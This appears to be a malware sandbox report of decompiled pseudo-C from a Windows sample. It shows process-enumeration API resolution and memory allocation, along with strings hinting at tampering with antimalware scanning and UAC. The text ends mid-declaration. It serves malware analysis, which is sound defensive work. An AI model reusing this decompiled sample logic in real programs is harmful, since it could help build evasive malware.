                                                                                                  				_t5 = GetFileAttributesA(E02854964(__eax)); // executed
                                                                                                  				if(_t5 == 0xffffffff || (_t5 & 0x00000010) != 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNEL32(00000000,028A65D4,0286CCD6,ScanString,02874C4C,ScanBuffer,02874C4C,UacInitialize,02874C4C,UacScan,02874C4C,ScanBuffer,02874C4C,Initialize,02874C4C,ScanString), ref: 02857E4B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 6032bb1559ed98a823780ea3a35b29ef58dfb1711ecd749b6dc01cbc9f0c2bd6
                                                                                                  • Instruction ID: 4b5374d15609cd3a4a6e59c0c07eafa7959fe7030db19a9f6c0175adbb776bef
                                                                                                  • Opcode Fuzzy Hash: 6032bb1559ed98a823780ea3a35b29ef58dfb1711ecd749b6dc01cbc9f0c2bd6
                                                                                                  • Instruction Fuzzy Hash: 96C08CEC2023310A1A90A6FC1CC816D42C8094593E3A44F21AC3CDA2E2E32198623821
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02857E64(void* __eax) {
                                                                                                  				signed char _t5;
                                                                                                  
                                                                                                  				_t5 = GetFileAttributesA(E02854964(__eax)); // executed
                                                                                                  				if(_t5 == 0xffffffff || (_t5 & 0x00000010) == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNEL32(00000000,028A65D4,0286F486,ScanString,02874C4C,OpenSession,02874C4C,ScanBuffer,02874C4C,OpenSession,02874C4C,ScanString,02874C4C,Initialize,02874C4C,ScanBuffer), ref: 02857E6F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 5ede7f27496aa7d05a39d7995107ce743fb0df7d598429dc5f5bb2cbfc69981a
                                                                                                  • Instruction ID: 824c9f66fb193fe62ad56c89e3b94cf3937865022fd78535d3c41af370bd8931
                                                                                                  • Opcode Fuzzy Hash: 5ede7f27496aa7d05a39d7995107ce743fb0df7d598429dc5f5bb2cbfc69981a
                                                                                                  • Instruction Fuzzy Hash: D7C08CACA223300A2E90A5FC0CC051942C80A4413D7A01F25EC2DD61E2E32288963921
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 88%
                                                                                                  			E02854C3C(intOrPtr* __eax, void* __edx) {
                                                                                                  				intOrPtr _t2;
                                                                                                  				intOrPtr* _t3;
                                                                                                  				void* _t5;
                                                                                                  
                                                                                                  				_t3 = __eax;
                                                                                                  				_t5 = __edx;
                                                                                                  				do {
                                                                                                  					_t2 =  *_t3;
                                                                                                  					if(_t2 != 0) {
                                                                                                  						 *_t3 = 0;
                                                                                                  						_push(_t2); // executed
                                                                                                  						L02851260(); // executed
                                                                                                  					}
                                                                                                  					_t3 = _t3 + 4;
                                                                                                  					_t5 = _t5 - 1;
                                                                                                  				} while (_t5 != 0);
                                                                                                  				return _t2;
                                                                                                  			}







                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3341692771-0
                                                                                                  • Opcode ID: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                  • Instruction ID: 224d1f1f229b3dbee71f46efaaf29df283a06c6050f86108bd35eb3e75922115
                                                                                                  • Opcode Fuzzy Hash: a5eb2145a2f9f3a0a257849b150a1d14aa2318bab57149dae1fca905b844e32d
                                                                                                  • Instruction Fuzzy Hash: 21C012AD60023047FF259A5C9CC075562CC9B45296B1400A1D91DD7240E7709C409665
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E0287552C(int __eax) {
                                                                                                  				int _t3;
                                                                                                  
                                                                                                  				_t3 = timeSetEvent(__eax, 0, E02875520, 0, 1); // executed
                                                                                                  				 *0x28a65bc = _t3;
                                                                                                  				return _t3;
                                                                                                  			}




                                                                                                  0x0287553c
                                                                                                  0x02875541
                                                                                                  0x02875547

                                                                                                  APIs
                                                                                                  • timeSetEvent.WINMM(00002710,00000000,02875520,00000000,00000001), ref: 0287553C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Eventtime
                                                                                                  • String ID:
                                                                                                  • API String ID: 2982266575-0
                                                                                                  • Opcode ID: 32a907206b6775765bf07dd8304d6edc9ce18e0d1988118040c363a0d3073f3e
                                                                                                  • Instruction ID: 04a022dda863c01333f1b6573897a466b9c8e028f440dd662778b704ca1f8561
                                                                                                  • Opcode Fuzzy Hash: 32a907206b6775765bf07dd8304d6edc9ce18e0d1988118040c363a0d3073f3e
                                                                                                  • Instruction Fuzzy Hash: 93C092FC7C63103AFA105AA91CC2F2B558ED709B01F940416BB04EE2D5F6E6A8500F69
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 56%
                                                                                                  			E02854BFC(signed int __eax) {
                                                                                                  				signed int _t3;
                                                                                                  				signed int _t12;
                                                                                                  				void* _t14;
                                                                                                  				void* _t18;
                                                                                                  
                                                                                                  				_t3 = __eax;
                                                                                                  				if(__eax == 0) {
                                                                                                  					L11:
                                                                                                  					return _t3;
                                                                                                  				} else {
                                                                                                  					_push(__eax);
                                                                                                  					_push(0); // executed
                                                                                                  					L02851250(); // executed
                                                                                                  					if(__eax == 0) {
                                                                                                  						__eax = __eax & 0x0000007f;
                                                                                                  						__edx =  *__esp;
                                                                                                  						_t18 = _t14;
                                                                                                  						_t12 = _t3 & 0x0000007f;
                                                                                                  						if( *0x28a3008 != 0) {
                                                                                                  							 *0x28a3008();
                                                                                                  						}
                                                                                                  						if(_t12 != 0) {
                                                                                                  							if(_t12 <= 0x18) {
                                                                                                  								_t2 = (_t12 & 0x000000ff) + 0x2877738; // 0xd7c9c8cc
                                                                                                  								_t12 =  *_t2 & 0x000000ff;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							_t12 =  *(E028564E4() + 4);
                                                                                                  						}
                                                                                                  						return E02852CE8(_t18);
                                                                                                  					} else {
                                                                                                  						goto L11;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}








                                                                                                  APIs
                                                                                                  • SysAllocStringLen.OLEAUT32(00000000,?), ref: 02854C03
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocString
                                                                                                  • String ID:
                                                                                                  • API String ID: 2525500382-0
                                                                                                  • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                  • Instruction ID: bdfc5bbdde123e1d484f33dbbe3b3312b6510ca52da0c07fa89c0e6ef6123dfa
                                                                                                  • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                  • Instruction Fuzzy Hash: 20B0123C20823528FB5419620E00732004C4BD02CAF8810519E1DCC0C0FF41D481983B
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E02854C14(intOrPtr* __eax, intOrPtr __edx) {
                                                                                                  				intOrPtr _t4;
                                                                                                  
                                                                                                  				_t4 =  *__eax;
                                                                                                  				 *__eax = __edx;
                                                                                                  				if(_t4 != 0) {
                                                                                                  					_push(_t4); // executed
                                                                                                  					L02851260(); // executed
                                                                                                  					return __eax;
                                                                                                  				}
                                                                                                  				return __eax;
                                                                                                  			}





                                                                                                  APIs
                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02854C1B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeString
                                                                                                  • String ID:
                                                                                                  • API String ID: 3341692771-0
                                                                                                  • Opcode ID: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                  • Instruction ID: 5036d53801fa56726ad7c168d5e799cb6fd09a7b6ba9387552a660a9bcc0b728
                                                                                                  • Opcode Fuzzy Hash: 7518974b7b8c9db37bd0fba7d8069a02315112198d91de4b777e2875ca661a51
                                                                                                  • Instruction Fuzzy Hash: D2A022BC0083330AAF0B2B2E000032E2033BFC03023C8C8E88E08CA0008F3A8800AC3A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E028515CC(signed int __eax) {
                                                                                                  				void* _t4;
                                                                                                  				intOrPtr _t7;
                                                                                                  				signed int _t8;
                                                                                                  				void* _t10;
                                                                                                  				void** _t15;
                                                                                                  				void* _t17;
                                                                                                  
                                                                                                  				_t8 = __eax;
                                                                                                  				E02851560(__eax);
                                                                                                  				_t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
                                                                                                  				if(_t4 == 0) {
                                                                                                  					 *0x28a3720 = 0;
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					_t15 =  *0x28a370c; // 0x3fd0000
                                                                                                  					_t10 = _t4;
                                                                                                  					 *_t10 = 0x28a3708;
                                                                                                  					 *0x28a370c = _t4;
                                                                                                  					 *(_t10 + 4) = _t15;
                                                                                                  					 *_t15 = _t4;
                                                                                                  					_t17 = _t4 + 0x140000;
                                                                                                  					 *((intOrPtr*)(_t17 - 4)) = 2;
                                                                                                  					 *0x28a3720 = 0x13fff0 - _t8;
                                                                                                  					_t7 = _t17 - _t8;
                                                                                                  					 *0x28a371c = _t7;
                                                                                                  					 *(_t7 - 4) = _t8 | 0x00000002;
                                                                                                  					return _t7;
                                                                                                  				}
                                                                                                  			}










                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,02851A03), ref: 028515E2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: 10560bfc9dd4d0d94eb95085fd2f20160ef2c1abb397d975921ad1b76caa51bb
                                                                                                  • Instruction ID: b0bec7b24d1adb01424ba5c643ed71e575aacb175318d7db500b421619f7812c
                                                                                                  • Opcode Fuzzy Hash: 10560bfc9dd4d0d94eb95085fd2f20160ef2c1abb397d975921ad1b76caa51bb
                                                                                                  • Instruction Fuzzy Hash: C8F06DF8B413005FEB05CFB99944311BBD2E78A344F1085B9D609EB3D8EB7584018B00
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E02867D08() {
                                                                                                  
                                                                                                  				if( *0x28a6350 == 0) {
                                                                                                  					 *0x28a6350 = GetModuleHandleA("kernel32.dll");
                                                                                                  					if( *0x28a6350 != 0) {
                                                                                                  						 *0x28a6354 = GetProcAddress( *0x28a6350, "CreateToolhelp32Snapshot");
                                                                                                  						 *0x28a6358 = GetProcAddress( *0x28a6350, "Heap32ListFirst");
                                                                                                  						 *0x28a635c = GetProcAddress( *0x28a6350, "Heap32ListNext");
                                                                                                  						 *0x28a6360 = GetProcAddress( *0x28a6350, "Heap32First");
                                                                                                  						 *0x28a6364 = GetProcAddress( *0x28a6350, "Heap32Next");
                                                                                                  						 *0x28a6368 = GetProcAddress( *0x28a6350, "Toolhelp32ReadProcessMemory");
                                                                                                  						 *0x28a636c = GetProcAddress( *0x28a6350, "Process32First");
                                                                                                  						 *0x28a6370 = GetProcAddress( *0x28a6350, "Process32Next");
                                                                                                  						 *0x28a6374 = GetProcAddress( *0x28a6350, "Process32FirstW");
                                                                                                  						 *0x28a6378 = GetProcAddress( *0x28a6350, "Process32NextW");
                                                                                                  						 *0x28a637c = GetProcAddress( *0x28a6350, "Thread32First");
                                                                                                  						 *0x28a6380 = GetProcAddress( *0x28a6350, "Thread32Next");
                                                                                                  						 *0x28a6384 = GetProcAddress( *0x28a6350, "Module32First");
                                                                                                  						 *0x28a6388 = GetProcAddress( *0x28a6350, "Module32Next");
                                                                                                  						 *0x28a638c = GetProcAddress( *0x28a6350, "Module32FirstW");
                                                                                                  						 *0x28a6390 = GetProcAddress( *0x28a6350, "Module32NextW");
                                                                                                  					}
                                                                                                  				}
                                                                                                  				if( *0x28a6350 == 0 ||  *0x28a6354 == 0) {
                                                                                                  					return 0;
                                                                                                  				} else {
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  			}




                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,02867F8F,?,?,02868021,00000000,028680FD), ref: 02867D1C
                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 02867D34
                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 02867D46
                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 02867D58
                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 02867D6A
                                                                                                  • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 02867D7C
                                                                                                  • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 02867D8E
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 02867DA0
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 02867DB2
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 02867DC4
                                                                                                  • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 02867DD6
                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 02867DE8
                                                                                                  • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 02867DFA
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 02867E0C
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 02867E1E
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 02867E30
                                                                                                  • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 02867E42
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmp
                                                                                                  • Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                  • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                  • API String ID: 667068680-597814768
                                                                                                  • Opcode ID: 25f160c79bc923fad7689f5ca45eb56f301796ba377db33cc6cd5c0bde8efdb6
                                                                                                  • Instruction ID: 2815d65a75cf095fdc645909efb88d26f78096c6d481c6bdd807526a8d7f1663
                                                                                                  • Opcode Fuzzy Hash: 25f160c79bc923fad7689f5ca45eb56f301796ba377db33cc6cd5c0bde8efdb6
                                                                                                  • Instruction Fuzzy Hash: A5314EBC9406749FFF00EFA4E989E3677EDE705A04B880A65B411CF249E7789815CF92
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 46%
                                                                                                  			E02868328(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
                                                                                                  				char _v5;
                                                                                                  				void* _v12;
                                                                                                  				char _v16;
                                                                                                  				intOrPtr _v20;
                                                                                                  				char _v24;
                                                                                                  				char _v28;
                                                                                                  				char _v32;
                                                                                                  				intOrPtr _v36;
                                                                                                  				char _v40;
                                                                                                  				char _v44;
                                                                                                  				char _v48;
                                                                                                  				intOrPtr _v52;
                                                                                                  				char _v56;
                                                                                                  				char _v60;
                                                                                                  				char _v64;
                                                                                                  				intOrPtr _v68;
                                                                                                  				char _v72;
                                                                                                  				char _v76;
                                                                                                  				char _v80;
                                                                                                  				intOrPtr _v84;
                                                                                                  				char _v88;
                                                                                                  				char _v92;
                                                                                                  				char _v96;
                                                                                                  				intOrPtr _v100;
                                                                                                  				char _v104;
                                                                                                  				char _v108;
                                                                                                  				char _v112;
                                                                                                  				intOrPtr _v116;
                                                                                                  				char _v120;
                                                                                                  				char _v124;
                                                                                                  				char _v128;
                                                                                                  				intOrPtr _v132;
                                                                                                  				char _v136;
                                                                                                  				char _v140;
                                                                                                  				char _v144;
                                                                                                  				intOrPtr _v148;
                                                                                                  				char _v152;
                                                                                                  				char _v156;
                                                                                                  				char _v160;
                                                                                                  				intOrPtr _v164;
                                                                                                  				char _v168;
                                                                                                  				char _v172;
                                                                                                  				char _v176;
                                                                                                  				intOrPtr _v180;
                                                                                                  				char _v184;
                                                                                                  				char _v188;
                                                                                                  				char _v192;
                                                                                                  				intOrPtr _v196;
                                                                                                  				char _v200;
                                                                                                  				char _v204;
                                                                                                  				char _v208;
                                                                                                  				intOrPtr _v212;
                                                                                                  				char _v216;
                                                                                                  				char _v220;
                                                                                                  				char _v224;
                                                                                                  				intOrPtr _v228;
                                                                                                  				char _v232;
                                                                                                  				char _v236;
                                                                                                  				char _v240;
                                                                                                  				intOrPtr _v244;
                                                                                                  				char _v248;
                                                                                                  				char _v252;
                                                                                                  				char _v256;
                                                                                                  				intOrPtr _v260;
                                                                                                  				char _v264;
                                                                                                  				char _v268;
                                                                                                  				char _v272;
                                                                                                  				intOrPtr _v276;
                                                                                                  				char _v280;
                                                                                                  				char _v284;
                                                                                                  				char _v288;
                                                                                                  				intOrPtr _v292;
                                                                                                  				char _v296;
                                                                                                  				char _v300;
                                                                                                  				char _v304;
                                                                                                  				intOrPtr _v308;
                                                                                                  				char _v312;
                                                                                                  				char _v316;
                                                                                                  				char _v320;
                                                                                                  				intOrPtr _v324;
                                                                                                  				char _v328;
                                                                                                  				char _v332;
                                                                                                  				char _v336;
                                                                                                  				intOrPtr _v340;
                                                                                                  				char _v344;
                                                                                                  				char _v348;
                                                                                                  				char _v352;
                                                                                                  				intOrPtr _v356;
                                                                                                  				char _v360;
                                                                                                  				char _v364;
                                                                                                  				char _v368;
                                                                                                  				intOrPtr _v372;
                                                                                                  				char _v376;
                                                                                                  				char _v380;
                                                                                                  				char _v384;
                                                                                                  				intOrPtr _v388;
                                                                                                  				char _v392;
                                                                                                  				char _v396;
                                                                                                  				char _v400;
                                                                                                  				intOrPtr _v404;
                                                                                                  				char _v408;
                                                                                                  				char _v412;
                                                                                                  				char _v416;
                                                                                                  				intOrPtr _v420;
                                                                                                  				char _v424;
                                                                                                  				char _v428;
                                                                                                  				char _v432;
                                                                                                  				intOrPtr _v436;
                                                                                                  				char _v440;
                                                                                                  				char _v444;
                                                                                                  				char _v448;
                                                                                                  				intOrPtr _v452;
                                                                                                  				char _v456;
                                                                                                  				char _v460;
                                                                                                  				char _v464;
                                                                                                  				intOrPtr _v468;
                                                                                                  				char _v472;
                                                                                                  				char _v476;
                                                                                                  				char _v480;
                                                                                                  				intOrPtr _v484;
                                                                                                  				char _v488;
                                                                                                  				char _v492;
                                                                                                  				char _v496;
                                                                                                  				intOrPtr _v500;
                                                                                                  				char _v504;
                                                                                                  				char _v508;
                                                                                                  				char _v512;
                                                                                                  				intOrPtr _v516;
                                                                                                  				char _v520;
                                                                                                  				char _v524;
                                                                                                  				char _v528;
                                                                                                  				intOrPtr _v532;
                                                                                                  				char _v536;
                                                                                                  				char _v540;
                                                                                                  				char _v544;
                                                                                                  				intOrPtr _v548;
                                                                                                  				char _v552;
                                                                                                  				char _v556;
                                                                                                  				char _v560;
                                                                                                  				intOrPtr _v564;
                                                                                                  				char _v568;
                                                                                                  				char _v572;
                                                                                                  				char _v576;
                                                                                                  				intOrPtr _v580;
                                                                                                  				char _v584;
                                                                                                  				char _v588;
                                                                                                  				char _v592;
                                                                                                  				intOrPtr _v596;
                                                                                                  				char _v600;
                                                                                                  				char _v604;
                                                                                                  				char _v608;
                                                                                                  				intOrPtr _v612;
                                                                                                  				char _v616;
                                                                                                  				char _v620;
                                                                                                  				char _v624;
                                                                                                  				intOrPtr _v628;
                                                                                                  				char _v632;
                                                                                                  				char _v636;
                                                                                                  				char _v640;
                                                                                                  				intOrPtr _v644;
                                                                                                  				char _v648;
                                                                                                  				char _v652;
                                                                                                  				char _v656;
                                                                                                  				intOrPtr _v660;
                                                                                                  				char _v664;
                                                                                                  				char _v668;
                                                                                                  				char _v672;
                                                                                                  				intOrPtr _v676;
                                                                                                  				char _v680;
                                                                                                  				char _v684;
                                                                                                  				char _v688;
                                                                                                  				intOrPtr _v692;
                                                                                                  				char _v696;
                                                                                                  				char _v700;
                                                                                                  				intOrPtr _t478;
                                                                                                  				intOrPtr* _t480;
                                                                                                  				intOrPtr _t481;
                                                                                                  				intOrPtr _t484;
                                                                                                  				intOrPtr _t485;
                                                                                                  				void* _t557;
                                                                                                  				void* _t565;
                                                                                                  				void* _t619;
                                                                                                  				intOrPtr _t630;
                                                                                                  				void* _t631;
                                                                                                  				intOrPtr _t633;
                                                                                                  				intOrPtr _t678;
                                                                                                  				void* _t679;
                                                                                                  				intOrPtr _t765;
                                                                                                  				intOrPtr _t766;
                                                                                                  				void* _t767;
                                                                                                  				intOrPtr _t770;
                                                                                                  				void* _t773;
                                                                                                  				void* _t835;
                                                                                                  				_Unknown_base(*)()* _t925;
                                                                                                  				intOrPtr _t968;
                                                                                                  				intOrPtr _t969;
                                                                                                  				void* _t970;
                                                                                                  				intOrPtr _t971;
                                                                                                  				void* _t972;
                                                                                                  				_Unknown_base(*)()** _t973;
                                                                                                  				_Unknown_base(*)()* _t991;
                                                                                                  				intOrPtr _t1050;
                                                                                                  				intOrPtr _t1051;
                                                                                                  				void* _t1052;
                                                                                                  				_Unknown_base(*)()** _t1053;
                                                                                                  				void* _t1056;
                                                                                                  				void* _t1058;
                                                                                                  				void* _t1060;
                                                                                                  				void* _t1076;
                                                                                                  				void* _t1079;
                                                                                                  				intOrPtr _t1083;
                                                                                                  				intOrPtr _t1085;
                                                                                                  				intOrPtr _t1088;
                                                                                                  				intOrPtr _t1091;
                                                                                                  				void* _t1095;
                                                                                                  				void* _t1151;
                                                                                                  				void* _t1156;
                                                                                                  				void* _t1161;
                                                                                                  				void* _t1166;
                                                                                                  				void* _t1171;
                                                                                                  				void* _t1176;
                                                                                                  				void* _t1181;
                                                                                                  				void* _t1189;
                                                                                                  				void* _t1194;
                                                                                                  				void* _t1199;
                                                                                                  				void* _t1204;
                                                                                                  				void* _t1209;
                                                                                                  				intOrPtr _t1210;
                                                                                                  				void* _t1218;
                                                                                                  				void* _t1223;
                                                                                                  				void* _t1228;
                                                                                                  				void* _t1236;
                                                                                                  				void* _t1241;
                                                                                                  				void* _t1246;
                                                                                                  				void* _t1251;
                                                                                                  				void* _t1256;
                                                                                                  				void* _t1261;
                                                                                                  				void* _t1266;
                                                                                                  				void* _t1271;
                                                                                                  				void* _t1276;
                                                                                                  				signed short _t1277;
                                                                                                  				void* _t1286;
                                                                                                  				void* _t1291;
                                                                                                  				void* _t1296;
                                                                                                  				void* _t1301;
                                                                                                  				void* _t1306;
                                                                                                  				void* _t1311;
                                                                                                  				void* _t1316;
                                                                                                  				void* _t1321;
                                                                                                  				void* _t1326;
                                                                                                  				void* _t1331;
                                                                                                  				_Unknown_base(*)()** _t1332;
                                                                                                  				void* _t1337;
                                                                                                  				void* _t1342;
                                                                                                  				void* _t1347;
                                                                                                  				void* _t1352;
                                                                                                  				_Unknown_base(*)()** _t1353;
                                                                                                  				void* _t1358;
                                                                                                  				void* _t1363;
                                                                                                  				void* _t1368;
                                                                                                  				void* _t1373;
                                                                                                  				void* _t1381;
                                                                                                  				intOrPtr _t1384;
                                                                                                  				void* _t1387;
                                                                                                  				void* _t1389;
                                                                                                  				void* _t1390;
                                                                                                  				intOrPtr* _t1392;
                                                                                                  				intOrPtr _t1394;
                                                                                                  				intOrPtr _t1395;
                                                                                                  
